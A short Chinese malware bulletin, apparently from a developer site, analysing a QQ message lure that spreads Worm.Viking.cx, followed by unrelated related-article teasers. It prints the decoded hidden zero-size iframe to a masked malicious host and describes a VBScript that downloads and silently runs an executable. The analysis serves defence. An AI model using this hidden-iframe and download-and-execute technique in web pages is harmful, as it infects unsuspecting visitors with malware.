传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样

简介: 传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样

QQ自动发送的信息为:

/-------

看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了?

hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387***384/

-------/

点击该链接打开的网页首部有用自定义函数 psw()加密的JavaScript脚本代码。解密后为

/-------
<iframe src=hxxp://web**4.3***9com.org/m**s/mm***.htm width=0 height=0></iframe>
-------/

mm***.htm   的开头为 HTMLShip 加密的脚本程序,分为两个部分:

 

前一部分 解密后的代码为JavaScript编写,如下:

/-------
<script language=javascript>yS6=5633;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};oK74=3345;dI39=7346;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();kY53=6773;jQ9=4206;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();iD69=5348;kH81=489;aS87=3348;mY34=4488;lL93=5630;bI58=9632;sT64=2490;;_licensed_to_="TEAM";</script>
-------/

后一部分 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web**4.3***9com.org/m**s/mm***4.exe 保存为 %temp%/g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法来运行。

Kaspersky 报为 Worm.Win32.Viking.y( http://www.viruslist.com/en/find?words=Worm.Win32.Viking.y

瑞星报为 Worm.Viking.cx。


相关文章
|
存储 机器学习/深度学习 Kubernetes
kubeflow系列:基于国内阿里云镜像解决kubeflow一键安装
google出品在国内都存在墙的问题,而kubeflow作为云原生的机器学习套件对团队的帮助很大,对于无条件的团队,基于国内镜像搭建kubeflow可以帮助大家解决不少麻烦,这里给大家提供一套基于国内阿里云镜像的kubeflow 0.6的安装方案。
9752 0
kubeflow系列:基于国内阿里云镜像解决kubeflow一键安装
|
Unix Linux Shell
Linux执行shell脚本提示文件找不到问题解决办法
Linux执行shell脚本提示文件找不到问题解决办法
1655 0
|
人工智能 前端开发 Java
Java语言开发的AI智慧导诊系统源码springboot+redis 3D互联网智导诊系统源码
智慧导诊解决盲目就诊问题,减轻分诊工作压力。降低挂错号比例,优化就诊流程,有效提高线上线下医疗机构接诊效率。可通过人体画像选择症状部位,了解对应病症信息和推荐就医科室。
501 10
|
前端开发 Windows
手机真机调试本地前端页面
手机真机调试本地前端页面
565 0
|
传感器 机器学习/深度学习 人工智能
动画制作效率提升80%!这个AI软件一键实现高精度视频动捕
动画制作效率提升80%!这个AI软件一键实现高精度视频动捕
538 0
动画制作效率提升80%!这个AI软件一键实现高精度视频动捕
|
算法 数据可视化 数据挖掘
r语言有限正态混合模型EM算法的分层聚类、分类和密度估计及可视化(上)
r语言有限正态混合模型EM算法的分层聚类、分类和密度估计及可视化
|
存储 Rust 编译器
Rust变量与数据类型
Rust变量与数据类型
|
Java 安全 数据安全/隐私保护
java报错javax.net.ssl.SSLHandshakeException:  sun.security.validator.ValidatorException
linux服务器更新JDK,从jdk1.7升级到jdk1.8,导致java访问https地址时程序报错。                解决方法:1、用浏览器登录该https网站,在浏览器地址栏里找到“证书信息”->“详细信息”->“复制到文件”->选择DER编码二进制X.
11259 0
|
运维 安全 Linux
Linux账号和权限管理
Linux账号和权限管理
208 1
|
计算机视觉
优化YOLOv5实现小目标检测的几种思路
在YOLOv5中,小目标检测的性能可以通过以下几个方面进行优化
1101 0